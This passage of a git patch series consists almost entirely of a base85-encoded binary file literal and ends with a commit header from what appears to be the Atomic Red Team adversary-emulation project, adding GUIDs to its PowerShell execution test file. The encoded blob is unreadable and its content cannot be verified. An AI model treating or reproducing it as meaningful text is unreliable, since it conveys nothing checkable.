zqec?KBa{9YQ$>FyTFa&?hHzL^gF#xkrH#-u`C`rbvqZt0Q(AEU2`ZXG2~VPcEFW!@ z(G@$1u|C174+dtBr&^1lXv*Vsb~t53*K5{DMeqIR5V(_0!F%Nk`#L*PKIN&N#DR$RFuOS~wdwaN5T8aTf#;M2-T z#tIBdz+j8GMKu?pz;3cdMU(a?F7^U-pVied1HPxdD<&$CPeLv%`*y|h$--yGrfeWq zj3#>4$pVI)zT9EG(P>T+u@p&7o61t48k?Kry9;uJ91bR|Fih~7Q=- zXsK>kOOvC?__1ZdLp!3TC9{qRWVVFb>bAW`W(Sm9c8b4LCb`&mVI-Wx{R2ivU%PO-p2XpEA8R<@GtikWn`kv4^qbY_;Ew^#Uk$)%S zrz{?UqV|{1|8c=@MmNhJJhmo94LPk45t0&o^$?UXkSoyak_2`nJYS;|f84Z$ zo&L26gY##e-Qppk7I8=c}re01JR#GRwpr#l)$6fLB308-x?g5zG;v;J! 
zWBDOEU-wH2V%c)&+h(CqGBH*32vOq#M#zf?In9<5Civ9_MGuu5&DI#KS7!L6oarCW zDz}&3uqgZ7qS<~L{8~qBUXzRZ&1-`Qud$z<<`$iKSk*C)?&ZR$bTuz4RMEx3Hr3i) z^z%7CDNSIN50MHq7AsCewrZ^@=D8RhG(Fc13z)vVEukA^G0xOL3AUN);SzJEm`cTD z487sfmT1iQy*+Uwmf~YGcV*PbA!NJALP=F4j}=NqqZF7|l^eCHgts#0WbLlOT0tHk zb8I6#vF(M#@B~lP|5`(}q$Hf?m%L$#VCS0?nZgpugmViAz4_K%)6)etr<1mFq8>V1 z_MN^PbJSj=z}WYxk`~{2l*qEz8xSXlQ_Km0Mg}#nS#l?!0hxk~Bns?9y!!HjZ&-WsG^%K%059AD>kj8FhPfH1WjQgbXK~A zQ)I9kmjug~_ur9o)EWBCsHD07nt7Ugw{a@9IwjLK4#@4F?_vYYUN z;z%8r6c@nfdK@i|n7FJsPk&)?grQ(T36boQ5~6foLXrcuFCvj}p=BgOk1r(7lPjPy zRb}u^=ON|ShIOQd8k~{eLv&YR*eNjsn+x%)QfDt1XCdDeG2_`08P#^vtT=sh*n-ef zs5Y;|N3N%b3HAbBn1rLLs&n(+3FDTtRTv3aOBR*5aSnC5Gzy&xuWUR0TOSYIMNWs1 zFF3RtD1&o3`Cq(vRxb!grCn4pD8#BuOp0ZUCVDW28y1-56ttN!tDHdQ`Me8qTILg& zl^Gncub7F#M9A)qLP^MXFf&~Uako^w0vEP9yvx*SEtZ!e7X$qq4;Z+~FCitG?MklL zY;mu}lg}n`3=iB}!lRLNoWvhBsni8)<3QyDMdK{uU;^QFs5Uy6VqCm*I$7xs*%6{; zeIhc+oWV6w9_;u;)--sEQK}kpPQlU;mdZQ_ry>lSB@|Fx$N6m`d0wbSPdtBs3e~lC z3WfCFJgs3&~iK*LEe#Ozb99IG1_K>~ zJP5jbw=bPwv&u@>_PHS$=O@5%B;%qS7C!@I&#^79RwZH|JQ zjx{oKb<~2nSZh{HD4us|JH%-^68s?HJL87`rOb+=fuX!Hs|zM?3g(0<8MD4_PMR`Y z0i|kc2uJ_Cfw6`$>oiOe?iT*cx*|f%0V`{I%krjZ%w=I}3o+*r7i`LyYlkEz^J_?) 
zS<`C<&8W%Y*H3llb>_L|Ix}XDoBI*6fVcyuf|yX~m|GBzWgkV(Mfh&TKeKWazH_X_ zM)jSLcs1mL@?-`O`W7=HwQC?A&fv`qQq`QFkKY0K4~FV8D0$osN);(J&GU`fJOqrc zhSY&IX6Zxiwdp#uS<=p%I@+v;dc*J@DL;>8+*k|MCx^12WIbWpkeM=Bl)_w7gfCl6 z^OzSG+pLIs*m`bBYRPeP1Sv$yw6f}AY%NIHnd%JwSnd`mllYrMdD*^nqnEDH_8O4d zGwdvC;%dznL2D%Tq|4v$$xE~*n)+f;`mMMYfj(#7GUYOIUPR5AdqLcFP}qA0DR6Wg zhKnuY*Z=Z@=|``zH{vxi+i=~_-n3 zP*aZWP=72dz->0wrEYBN23mOtkRj_juCLWO+%m(U&f<@wfIY*0CqLmhG(B~*fU*z6 zO)5u8%b2Y=9zbfR5uW2%+mO7ej5zFBe`H|9M8{ECaxz!d5Rz$doa@ZWp^VIfGr;sT zrId%^M;b@pBE~s+7h^^1t#gCCjeTw|Sr8st#fWSmw9X{7|Hk$jo7K#{g;?mp%gH5J z|3T0glf2I6e3{F6Tw0=uRI}J!sZ2 z|2gm`rlg~K5Usw=90Y}&pKZ>Zx0yR7OjF$G?VX$f8nz$xsUXw>LKM-fHJQz<%ThQ7m6zLRJ>y2j9FY%h)#a3-0noYMnR!hWgGxQrLhmiQQV zqs#0|8sA}lKZ*LWy}3$-#{A{if#Q57F&;RAEI+?0@aab=y2@z9d0@gtHwFIT-nFCg zTJ~I+`(;rV&UMz7JXd;S+qudeDeX{t_ID{Ze(yjzYsf3_YLiLI zN!R~ggsPzC91B&%<9K0R3uvkE`i1^^>}$GolNo3;aY?)mLFvxRLbw&~fOb5AR!E=~ z6KJIb+Drm%Hi32`fmTkS-Jd`^nLw)~(B=|o)dX5CfmTnTol2lJ5@^i?S}TDzpFlgE zKwC(lok^fACeR*8pzTPY?M$HUN}%mdpxux_+mk@sn?T!_K--@{J78%Lm)fIXX}y?OC36aC>5|wB*2c6>zz1(rU2gDhx*!s~Z+!u^SU;*K)a=mGV?uv`2F?1Mox+#t=8J z;Sg@NhG`m$8`&Auf%BAHApCFXSR8wck?l};QYTaN_G?+wdSNyo0 zV`-1Oje@p~Ze!x(TFarWp#mTC%Lsp=80pF>dEMk(=QE4?(O3LubDWCCowBu3{zsvQ zoP+b&&CXtoXbN#0W28C(vDfnXTR}6|x>WVol`8}BdI}pPn|FE}xBx=O=H(%b78RA5 zKDP$F;J2!bVIL`%=(S~IfA`^^=}F4d+_c85LY!zhxVb(LE_2{QTX-}&Zm`rWjB%-B?eYJMIMvp0%Hi?CwLikG66W-O zl2cvQDNnPL>W3NOt>ko$>yh_U?MfaN&{DdqpIrXiJ?7*?J#nL5ZCzhg2EDVv8N!f{#q{8^k@mFxoM#Ugzc%A^u1V0Za3zn(+;r}RJWnE zXFjYyw-v0FHZqrD-LwQ^?7b3?VlsF7gig@E9XSW#%-CSar5gt>mQEw8DQNAef1(~= zJCa)sO;hVuL~En1veXGNl+$^+wplth2T3>-lT*$^mM03d1T&ZNd*o&m4lu` zPWN#Q3a8*q;BB-TNvLtk5w ztu=>#+Ipzfb}FZ-D0N}ODN_<>c%8mY9GIEiF1*$#96H#$v)rt;?zPR%4ANmroKjSq zCg;c2&|SINst0duK{u%a&c`-&J8QGe9pjPel!+`A+nj&l!ydD40P=4ij@fu5RyF1- zx+i0yLjHS_dzU@6ME|awkr4?+`H=yXWU1*$C1beX19r{P%h9Cc7Cp6sO6r~X)#ECY z&10MwWR&A2V@$v@>U9$BJ13*44yMXO%ofUW8jR%(M)(8JdF(X1%x-go*<<#aeP+Ko zV9Yi>Ba!CX6SJP9mpdTt&^QWsyvk8xwkK(dTwAc`*(2g!QjxJ!xTWD~|w3i&K-du%;(T4{LgoG_j^9Nf&E+ 
zlC-g=CrKY`dXhA|G_$5BNjGbHlC-ltq)lqGBn_?UNz&1p zo+K?T51f+HP14kwo+MqZ=}FSonw}(mt?5b9*qWXsovrCf(%PDyB)zTaNz&Y!o+RC^ z=}FSwnw}*6t?5b9;F_K!9j@s~(&Cz)Bt5QK9n$3XObcfSn>b9ve4&AbT=kPNUEwC` zDfK9MR_6RHI1rwql0S2RzTB;lzYPdKCBKRvo~utp2f0T%*dX+5JYda2KQskVbWnJ4 z27<-&MeBMCuw(d}L@p!Hq-iW3k_{uy0RB3L1)rx0#1vv@ptUeP>Sk^OI9z9r865mi zqttR6Ac|8$y7a`vrAYZun2U09!bp>^l_Q$W}%a7qt63O6gqu$sy7=z3idw_z>YhB#Oo z*N-3$g;kb_YrDBNN=cFuu$Nj#p_Vcb1zYIT*YhBjVJSxlCA$OV3jf>YyOzenafq9q zK$@fU*^fFxQrLJ@T7#o%5V;me>j`LDXO_rhk3%jvAglKQgxi6-?+__qugC{Gfs>X; zi|m({VXk@n1;_vy^E{_}c^dXdh~_4dvrM z=63^1xECd4%?_ZZtm6)po-IzBe+IOK%PiH zXUH<)k8-vFdtsO4z6YgaPjR&GmC~{OUGK5v`=xY2@9jmZJ5VpiH(P=^5pL)BR?=J+ z9dE&yGT9mQw$_)DAamOzBP19}?C(5sEBGUc<)1-VjwMQv1(eyW4^quxu8*RgyAg`1 z77(r^v31O7G25uQ$993gZeNR@*wgq7(Jsdl&RGqfcp({C-mz^E#(OOedCfWN8k;p zMG>WAt8J6t15z@MvE#^#Ba!{UIkpRJ&2d^nJM0(g4#e1v^F2*n<#aW=VJMbJPgsWW zTjl-?Rx`>{Ir_4DxcVp?Q*L+yEL|%*|o8H`{#={+Tryr08~E+--2=v9H)3 zOk*cf<_?7Y$?-s19yI2@4W-bru?IB9+KYeWNv6js5F+WraF4rqaJ^+*t4;bI{NZ#q zjTjigT=m1J!#r`s`N7s;$IKnDt}jmE6YNc~d)nfphY6%Kgns179#0gw|LcduVb3Qo z*KlFU!}m+S*qE~JPjhO$JhP@@4)u0iUwH=cAll?1{5my?iuLk)Cs78n>nC{h@+_4B=Wj|w0C!^3FlncMxb9-cb3kq z*@-+B;m?wojjnGT1@m$pLr^Ws@H7f@VFDULNjfy_!-_gSrB8hhSDZABUlQ>y)-1p(i-=C5-S_ z@gWxVL5r-TcK;;)$my%-nJE~8@{H^#xx)G>z`%`pz4bcm_+M!5Md+=tCAbb)6TkOj zd_Rbh{t&3@XVTc~T(S!@au5Evg7yj5?PIH4vr}As;8A^O3k}0?`z#%$zbYvV)7y*>xg{g*MZI;e7!Pyp<4&BlVNIL~_=1Gv+B7Kn$~?ZHp4*KzB3{o)^unb0HW zSr7IKM%PaEN<;dSwhbfbVM;cdvSKt{pG62=Q!i}Pp^wJmWzQiGUWW);CXm>jvF{T7 z1Rls4%vsOf5`XvO53Q8#N2=tBPXDbvOI{gBYdXT+SWI5?&Ue0R8O-JFHPl@zX8SpN zL&vl7J#&pK7iVJue3)a4yHw5&N()%YmgIw&<(OxbrOqKqoRj13Lrz(61wFV7n-04p zwDYZ-_K>-cHZ;1&V{ee>w6|MeAfGh0mlzcnG^4QMY>Vf81nsQm*a>s$oUMg%eoLp; z;t4?2pJBRY>xr1I?Bu2w(w6AsY`pY`h07E}b1L9AJoV|w^*Yv!b4q8LInb$QS;ztz zq)yJ@>cyVro`~)X;T5|f5tw@}v|a({aAT@tO)p?3LO$3Rop*uUPj0zHd+t2fdKj!< zlyAU+FSyQOE~oS8KVN5+TWm?LAH-^=dnEFl@EQ>4Fxa!WTG4UbIEfAN=jD?a3EVlc z^{9cS=GLwv7tl_2#l75}+6H!TTubHJ%=PDLb&h1qW4H6*ya0)qTDQEFv&S)xN8oCJ 
z=Q2%dbSQ0MH_~CfLC@{WptUIFQD@EFp2{%2_UaVdk7-dBpk`iWDa?xVE-l940WB?a z;uRb2b2+n$;PG6Qb**Dv)Y^%>i`)i#v-2G9xlD%}6Gp68AY-n*?6H)QW~ zRcoS`D1mT9Tu3i~|6MhK{!<$Y@*k$cxuf#eh4NFZa#wMb@B&}>x|GTkO#4Fk^G@>T zYdO+RqlBC#tn2^VQp%~p_Bhv{5Zy&bu66-yJ-Myfeh20R+rV9QV##x$9Y;;L`{8I0 zt;H9VKIZ6Vo*_{}3OIo4Gt2ERAVq4U%`LPD_#28g$M*8MTG7 z_H1b{d7KZ3baFxEM~lFq>fGh$*m0*%9sBw`c%|-SFgk}g+Bv6#YmLFWtx|M&w(C05 zzRx}1JuP^_R@Rfc8I^Ye&fgC@cZ2E&&T>u;r*eViaGR97QzGTKWl3FIVFz$Qy#YD? zdX|#&mRiOIq;?QvmHbZUfpQl+Qah}6=u^~{>tzdT8D|Zxk~*w!=Nx~kiNPANaR4)& zoSbLBdTMxX9*my8Yz%qxq$A*tw*2RmOR!J8jH_hg-u66u$?p3OP*2BIIk@6ay|25# znZzA!DK8)&wEXtud^*Zj=S*FtK1%rL1Dw#d*Md6g&$M z^ky?T!wkl%YEe{vjEvHA){v)Btew;lx?Rd)P7(=v=zM1-`y2BpHzrczf9bw;wbMIe zo$_(?ijSlJeH?A$<5(qp9GqxfkPgq30yj?(!)~4uh26VjZarBF;?p1H@zdv7f7nfb zlriETcGDl_j`)Y&^haGH{&6>U*Aaj8MZ`^AcTUQswg})55!(cj0wNT0pm-S6DiTIC zpQ1^@6+GxnHCmfDzx%6n_2?ozFlFuCW zb@ZWaVsacgmrTrOU&lB+Ywna}Rgx$tCy29nxPN_#2!IGZrm} zX_v~?)j##b6Ec)=R5wBWOhWF69}N?->A~rA)Q``BP*+(2=MU`23{HEa;es>*Nt0`h zfsI`>WO9nJSdeRY>c$jeGT&CVbQLq5yZf>|k4>!SWuvltN@#&Klq%WQa*KN1DDt5e zo;?IT$LfR9ew13xC0XRceFrVDC{5e*M{rqPNmZJr)df!qd9Ka#Tw3p&)hheb-r3y5 z-Gru7M_SyAvgf$#&^ z+{KNdwn=xtVO?=qF#1`NkXGUHuus%N#>{p03vO+UNQpVZInsC@!?EO^Yf;TZV137O zhU*@h5tsK%p9L+YBZD!_rlnFemxNOcwdR^3j3ezQjHYXNtC4m9EN6!pu=@(z2(eA0 z)`LiAbF?QDLR{s>8+9%T{+l^Js1fAsNepob$3b{M$(e<`GfcUJxf|DW==nTP{5b}x z9aSv^C2x)-t(Wfi&7SBe8$<}+2%$EX<>}Biw?${Un{7#!!ijalsRm~tOQ(Am>I7LY z?V;#?C)iioIegnV!ZrLIBW**eztD3=@-aOp>sb1Io#HF+?-=incuPBO!IDScSctZA zG{w+3zwO+-K}Wux(*^Uvw!}X2Uh3SKzk9Zayo#?Z&=RUc|82~IpYYCfR;;NffSc`H zTT~Ow6_E3k&*d=x#6G-6*IjZY=EFFu`^d{KSjOmW$$R;r9$Gu{Zdc;S=-kbhB62p} zfER|t1Zmke+3MnOl_;VPHPk^%8J?|}LEBtN>gcJfqvkuTZDWeMzhmgb(mJH^5vip) zn;D9hF}fNtu3jHx-v#40fj`_7ouA1i?a<5XxaPMYYqZdZbz_dQOm5X}*J|-*_;Iwh z*4lC0?J@qcUCuZtFVWtN^Ujp`iUluo-U!R0?Wh@7d$uHRLG|G*WDcB%F*u_7@XNJn zJNR!CP`T9&z;-~M-HvoP@;KhPS8ssAQ=%4jHtfZ4dzsm#^CfR7Aca7W(g!zrj>~mF zu$}l@x?RkA_iD|JkX_|&)%Ng{QS2ctE2Rdu2stzPC(BRE0JV|k-pl>tj!ge8jk!?n z*KDPRiI&ZjpWV}S%0t~4D~YADIraZd>ukpi<@%C`j7E*6-YqltE#0Q)JJvXd-D6$4 
zicv1)zMPsQjul$>nT4h6dSN4wz1W`Tc4%p$bmS}6ob6#_JyH0-Upn*XSiE>@rV=fR z-fB+1SgXUviRO9`6I>OIr_SY8muoUuU7mRNJP<)S)m%;#3H3@V1!@ZPbaTT-CZbnm z1JS(*It78i4A{jO##9}b1%WJr3!SDx5tOB2nba)8i4_ZA0yGh2PF$#nGaMhW;wGbl zn7sT%aW#0Q4*vdw_b0lb7pobDVS82BW(~^B|MuRHX$3!zqmaAB=1=L7I9JMeG-NhY= zmu>0r=cxHm*v5xp$=_)st*y%43>TebI(yRY$L8au`mag%9HlqriO>A}!dp&nAA0@Z zw|{u`J$qhhxp!>Z#_k>O82jdXfAO7v zm&Q~6-tx70H!jtcGRAnzJ#Tq8oNK#!Qz_CtA|8-#BHiih%-TZAcxG~KxBCpq5Wmb< z#Wyv2TeaT#W~q0k*68Jzczf}2jw-$~hYyYP_2RQFbNSYdz53aqdl9bDi*WqC-F}Mb zjurNsC2N0pTP%-j+!u6~$YU}T|HfGSD|7Wyp**u_vzH>4@X6m2J_*9F9fhLa6pMP5 zex`<%;n#%m&3cxhpj87Jj*I5;j-^aG+&nw@rH@|u(noJ0UpP_f#m5(WtF=}yzQ2H` zn(LjJZ?sMz*}Q%%cXI7A`C?8NKQ|ww?wO%j%2)D(qP_fJQ?s`=(_7(phHVxzt(PB;D&xB? zODDA_mejK(se^}?jYW3p#MEY64-Z?bsjlB$w z!H7>$R?s!_9n{{Md>gVCpUG;JOZehcZ>`$fTB!9FOZC=?UipAav-dbY8dIcC5ucf< z0&O);l$s}Mm14M`FbcZQo=t&st!$lWsDGqfQ}F^}+#@+#5-76BMfbgzNL8MH2$k0 zgZv|sa34N7DO8!Om>;2$eU7BBkJWsge$E6FWL8QSE=GF!hV}UC0ViDBWytdkSRD`m zvtj)*Uv zdNy2}+GvmlA}y!iCI(5Zy<(MtpTu9=y~5jY_NUgL{Up-y5DJO@)Y@e$QlP*AxOVvp zZ!P^-c-?E4_X4cnim+?DF#(Vp%C(l{)Y|pi(%oh){<^!mQFI{Q^HyAQ>H3Q=UA2Da zre(`7UE95!|M9n*{}Cm=eABWGdyvkh-QA`uwP{)RrQIyYE$jPH=qoPWa0}S~D*6+w zx^#JOI)&KFdQEx(jWUJ73{5t@PCsY|Tfp8b*)HkI7Ms`h3MY! z&=UJ|+adTXQ&$>x)7q|8sSVvL)VKT6i&7p? 
z^>jZkMbKwS07lqw_H~<*Ls?&x1jXxKfgGUm-*rfdm(U__Y_MmLZ;`$%^Qz8(y?_!ye~_h?peZOyaRK8y>4KH)-Uj z6YC01^070_extFj`l^dCS=r`Snq}xicoWu9jkQ;-#yHqx3v%&_W#L?8(tTnj=Iw^F zpThsQtyqKdZ#erI)D}OVlOL%8Vtt7-4fOSAze@W0v)_n#)5W2~xb}DLYSeqf*)Mn- z&BhdIUqBM1F)^iSvd_XG!dPSRuQcgZDYQ5Ej9K2B+Q>?x*|o_b8Hg{5tVglq|`lyrz{zP9=Uw zv@AKIZAPRc0s3G>%5hOO)`_QkMUnZqAtxfNu?a+@_k`E#_G#UIOt&A`?I(2mySn|PZa)p^UHayJV zqfS>u60k@l`8K*iqmV=x0-`pduB{+xsZ%0^{m$qQ`8`VBL!tydT8YHd9wvwFP{La0!Oko5%P&aDWCBCX;2nuuPAAxKhWpnkHfLI{#pyM$u6B12xS3*bIAdZ8Cmp>F+@uK@zW zeT_242uK`e2_3}EO?;0zNIOJJK!@)ej2iG}j;;0KPzS&PAiPCahU;RzDh=+1oruRZ z)(bFNj%q9pTLgLT&(32NZ`c z3;{U}#WW27bb}Vv3wtT~?OP=yfHSbJ)+I4$7;SPPLAK3BIPlQmzKBAY=a|g$!W!jp z0ASQ$1a9T1i+Mq7G$J>=xG5agACT(GP)Zy=!4F!H!BaJe!+0I7xha4|dAUKWX=n^N zNqp&}Yg-)=0&pnQBQwYop~glx&nOx(BBM1BF`_F$3rBj=jaigC z5N3k|+7YU6l$%7)7NciXG$j*!Q;a^VqLuJ+g?M&kM9B_KK_ngI>fDv|#2nbwGXxE- zw*f+MB#M@RX4tOxN9!@?L7T@+vV|gbBj=EulmS5r={^e5QgF5uJPQP%JWK&_n^m{7 zQF6izr?B>GG3#j-*UpKJ{Td(;ygiBD8nd3n%NFt)wsqk&0_QB@Y!275v5D0G1U^;| z_2CudG9BTFFenI_@|mVf>S8meQBLd7>0s~Au;?!B*13kEJ3$ImqGDG$Uz^eupk#{NQf_H<*OZ-ozEFlb@ zCGRuLn}fqQ>grj)dPCz4d{C-e-x|`u9P2kpESeamwFqNsrPzs#0zYGGMs2{~akU-| zY1W?}Fi+*vsa*PazKcFuyP%_lqjui$^{g8eA zJE%H1^;69243dSI_Fi5rUZA|j1sWRU!V9Lbn%2sT!OOk8Sj45?-_dTp@H>Jy>f47u zT@pt~s$AC`E~^ENXKS%miwXmewWvNWKr1R|$lKXk&639&#yRM03fBt%W?zCv$_Z1I zMD-B(JX+z}(n$bZqD@0vDN23HwX7&D2TDg`N?yTp zCf6%7Gj7r6vepU6lk^oTOG}kr?L{KBkDW#pTpx2!jO&N@f~y zAc*_wc)C~X2uu$Mifi!QQ_9M}N9mDQ@UNL1@<&0H$x@+7g|rmSnzVt3_6wt81< zc@*qMe*`H(^AVa8xVHN_(%*X!Y-`ZYvKB%b8Za+mT)Jr9q5Qv(o`{yT# zCs3y3CH(i4zGo}tdO9us698Np0}(*(kzoI2oUSaQ==#gu0<^I_imi(_!o-m}d!$YI z`gN0Xkvy+$;;nR|BiFduOG>VOU0MMtY#JmBk0ErUBV1kQZt6y54Mkwr(~gB@^An<~ zWZtpXZG*%$7wTP~BW*mxA|Wl65EFYd+VFg+VS7{y-Y(i{sl}ylTI$exj#VkK0Jhi- zuC=SO(Nw2omUfo(&Hp-xDnjrOTMNw!UE3WOG200{9WyGMFhzMq0a`Eyz2~~*Y9`*? 
zp1Xk+xBn|5Qc31?2~XV>PqF!VTtZdKmD&p%>2KL%r}W{!>sd{1RErN)B&fRw(bDMF{}- z-Dp%PT7ISSe3!{TK=O;2!|R2s(I_UUqW39W!{aJvMy?mGsrfGAIQuAEYr%H5;O#;h1x^-EBgE_=UYTEF&0^))T+?&kAy4*~V0Qj?za$i<6hk~qTSRcgEIi zPamoKIT?&p+3h|&5Yie( z%n4-}6N0Ho!vQRQ=Q8mzbK7`6pSi2MI|nn7$#|}7GC7t_%k*w6J=wjrr)NiZZ}$Mq zL{6H6?sEJ-WXHJ!O<7ETcD;e@rY9$I>3F6qojuWgD#!f#x_fqZdkkS%r7Kd4E2Ftk=gnAf?HnbQ8O}dm>F>BTPqK3>Y+^@n$<(I^wbDc zC!k}b?qC*XD40KJz6egTB^_4uJ?W^Y@I_E(;fttsKWy_wgXgIHpwIT?$JvW7f-@Ok z1Qj4?OzTSXeOkzM9Wqnqsr%y4xoBEPNLw3tO-eg&JE0;9ymgza=_Kh6VMbQu7^7)4 zzb?lDi>71~T_Y#Qrt-;&x~)+4Y|}K@f%$vyjj$h(&rXmoc0%Za2XHw%QK7QC$K$CJ z<|vworacfW`wO4MIktEA_IB@0psyzLGyCJI_zCH_;2v48Tvc3wgVX;godh)Typh+k_c{6ZUpLuz%l(@Le?R$RYE%nT7tV)VA0nSlJG# zY=^3BhxPAL-r>~9OfGLuc0Di&G)pcFst`>dHyfn{CAC}MLbYzk?z}U8$Jia)dv|W@ zGkbRItYw~T+}?^+3xz_!j{6noi4cG6+fCBS2F-jt>Ek|K0m3CF^T*W)bIhE?Ff$oX zVbGF$*K{rc2F*qn8KiL`vaXM(W)2_P3xiL8TfEL}$wm5j*+KFY`V^1olZPGZVTUk+ zKDq8dGx3*q{Y+GsENU9}<_?(;PoWhiLRp2gTH?GP zIoK~Ud+2^Qg|yoOd?8S<7?WyR+5_9_KoT|3dfU?C0oxqXJ~KaH!!%!HC2$fMSl9fC zl@+e0Eg)ML(V8|dJ>1f(TWy$*#OyC}8I`NEPEZWb+-QuhPH;YwsQOkHHq0>#5AbpX z{Q^Pu3*6-4h*?`yHu+UCR~CSr z5LjVlq>8$cO zX)5qqDc3_C23-vV}PodIpt6S8xr+ypeXKB?fxV(-Y##r5=d^DV!y;ir-qzADpK|?Q-u5L*_ zHZH9t$m*+G9wp2t=M&~+ESCL7)h&31p*3(xqyZ}%4L;r;kR}O0kue-HbI`w37ZRvN zi!A7tK;c3DP~DQTdK4?1;rb75vi`$Ito-2S>&ro?Tr~Sh$d?WA^0X!A}$|JWlijs<^D}CmV2(Z0P7z@+Rbyr-s=HA znD;!IEFah{L#eTJ0+rd9oJ{%{$#p8Rte=#N@AqZnCn$D1izHP5_vS#B2h#bGsZ1sf zyTODP)z=IBOBHlD?&5$b5z~3-|C5O-RAJTbcnUkH9h-f%ytWw7pI>PEzR@PKT4{o% z{?fcnZY%ZP;z-i8|F zJQZu_9a*iv^2rZ(Tqkx0v520>(CZZ;`fn%?mymG_B~fj1D4 z*DuKR4GOd87fBIyioxP2qVjMlVm-Ie_8n|}3l@zACLqQoW`?GdxxCL9B1rssa^$k% z_!2apHechpFD|Rdu4UFM(uQ7FZRT~=W?pyN%HRus{JQn`zFzmah4mPZ z1x|NyRo_qP-HXV{rT5oA$%eqgP4B$^^1KYSl7wdcWrbw|SMqe^+v-7Zs}c*He7Qu6 z$%UEljGLCVeE4t&n4#%RQn9bm}fyLhy80+$JncqBucPwq*yi zL|^%otU4sR?QkmRc8dz-m5By7M7MuicDl7WEzh;et4=-s+Q)AfBwYI}9=nw_omb2W zQgIHs#LKjqiOXfJ!n~tu^*G!*2chNt0SotYnvzwo{0LcC;^0)?dU>Ams?NdMV1NlF zeKzNnmlxgX!HMTYS=Fns3RNKT6wAt$>5XovNB@nlC)~jJEyjp`spFo&n6rScAi21G 
z0V^wWn><#pCAMHxr=l<|g)d$PgYt9)Q$QFG`sP13AcGZiaxr54osUdAZv?>;CXA!~ zpapgG3nG-{;{tX}!Bv``UB5+Kr5Re28b8f=c5GZk>Pt$bzNAFzOO8l=$s?6j*ONN=b%rg9xnOXMoi)4a2wl^R%3jXE- zd}(O502`JP0YBCYA6bxfJuT#p9_@R zKl#b>$o~fjMMC}P1}!hEPP&Czjg^SmrrWL7fBA?RUkXeXZAQd^#3vgjm%O|pnNBan z%(dz?sbER>HHGn#$QYDD7bJQ3q_IjO+jauI;ul7d&NaQgA zq#^(E(r476kNazF#jzYNgjB9_zMqt>67!>D_N+GRtX1;$TRl(#Xj@&U43sIef@ z1tD4O7dMv=D}PZA%bFl8%Z8XI%YpffzvGpQfXj!fr^=z*^vTdI7xJ1pz`%4E|2v|z zKnXUnHlO^pY-p1qrd zZYvVhSunQ^N4sYm(C*nrNr>O9+ncOwJ|Vsev((XaCJo0A-W}u8;>)eDy-PsZ#Y^)G zEx0JwfA@N}rBz+LpJ(q%i9~(6-DCaIN1~%kjVb>Gd3>phE0Uvv(#X?rmPUWq8Z4oN z`dzxcqY(0;KD8vcm~)ShpAaXPx9}oap1$6VmR0X5pRfz6M6yBMzIXY0i@PJi%f^$1E0C2fv{EF%a4@}F3Djr!e z%qa$L6;%;Fpq2|g5xSqkPQe=MJLR-9<`ia@4QtllmVY zC?~E@#q3yFRJrUD)+g!iEu|Y&>Grf1)iC>@??GF3budR=9n4YcV2--SL0)r?p1oE) z7V?_xba}p!UJTVyt&SJJ!Zqo#_BxhbV6vF~LOsu$y~;CEc~`fW#dQnMmAn=WX}`sx zYc+Lya|5ZF5YCCz6X|@)%x}r5g9*1xB#(vVaKbLQU2>qZr@v1QKs}!rkFazbU1HTIdsZPVtG`FB`EdJt8()4rHW=bc~uU4Qn-Ox zHvm5@avmw(xg{f5jGQe+&K4ujmLkvUA+2T9oXqg#B7+NRnidOb&4WoetBub%G3_Dk zCaOX76w+FUQru_Hjm5^m30&p4$|jHn z{ywsqbPfe>fbFJAW|{^K;E`Jn0q0Ow2aTwf6oqqElgC+vg4duU3r#B~nr#bdD?Nn< zUY{jQu$4N=@3Aex`TQm{k)i3lnS%FNi9Vdev5yKgaul3dkTaCw9$ZdmGTAhC@u|8O zUo*D>7#|{Uyy5{#t_B`?jwDZDyE)EJ${EfF2~8uYvQrlaO&ZuUnoJ{dRY;49btzl} zyKy&%v^D#aspRC;q;Y6uKp@;_rcUI?)lrd;Nb7k-wVp?$Z9dYB^K^F)I245aNrax3 z6@}M^v{hbu7Ew(~_+9`efN?;)0&5yN(t7XfBJ8kX%{m8*R(y}Wq^e?HGLIQ0;=su~ z@J_GZhH{&Y4Zz08zyVDogbpV+*cQ_{=ls5nu&^4U58*Kr8I5IUNyC;@^?@cNl+(>VNneqT`;^h_D`$ zgkr{uw{p_D{hFFV*ssZ>by_`IrSw})~_H&wX)?+N^J<0YxRsMUD z_C3a5miWsm{<6ehX1p9WZL5=~@j!<3eocKlQOEPQ;fV_;Roe}1I2ql388vv7e-ZrY z_62TAv|m=Bzbg4(2x}{Fj(Y5Nd4kI>utiB3uEE*h^zq6g!f~e~-U!b2#`}x-AH%8R zOo;Fsy8RXclJ~0s7hxISn9BY+#|A{S@Eq=o3Pk!#L$-K^r#!f!LO|u!QOCo>0dZYN z9g;|B4UR~+Uv)loZm7vhI8?LYcF; zxO^EYBdu_P%)!e3Ai7=a((Z8ndbCCc@5En^20Mp{*g2pVa`ak5OM?UH6m9pVm5+{R z)2DJFW)!o3gF&vLXb6hKf@zo`{b_ePGm}k1>0tcpbB3|CXDd$Ny&cBA+qT_tXYa9| zom=|Moqb#Swv8Rz5-NN*+jp9G_Vj8R*+#EAEmqU^qQiF`7#hVv4wL4o 
zboQamj+E7Zvaf3g&oyl;zH){Pau}W87{xaR(n`g&f2^DQ9z(R}7{cGr-il~H`?0Du z&-JmcyYD(8Cl4PfBH;*Js~67 z-+oFn?v>E*FTaZzsF5~hz<_8iz#GQh4<);srlE|I-dkjnqG7!EDX}gi%q`0k7URPAkot}5}Op<~}lmocaO^f^6r8Odz zTizhvc>S4_;2Z&t=-X-!N}`vP1Tp~A^n822IBKD97PoG_!dS^%`3D}L!NsRwN4fK& zyO{|OMCE04AA3 z7P)xyQIw%y8s#(QA=Kaf4GO#moigZJh$XwYa-HR9pj;3)CAj+pzr)Cb4w0tdD<%>K?9GuL^~-7SqRjl1Hx z91e}0m@$w=D%amRl}+81Q(i8%6s<(Jz{|y5@!VwB$=*%_=Y}VbLvVD5HYpF88AdTP z_cVAPOdKRTjTFYa{?7d~m=wT!p-gF+!qpU9a`r6iN?3edQqcl%)9g@ZL5Bp|`AZkIxLyRCc)?l>%=8QEsGFG1eF K&+>O31OEr4bf?q+ literal 0 HcmV?d00001 From ed31f26ba948b1d3ee5dcdc6b1ea9a87c67f7bf2 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Thu, 22 Feb 2024 17:37:00 +0000 Subject: [PATCH 04/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1059.001/T1059.001.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 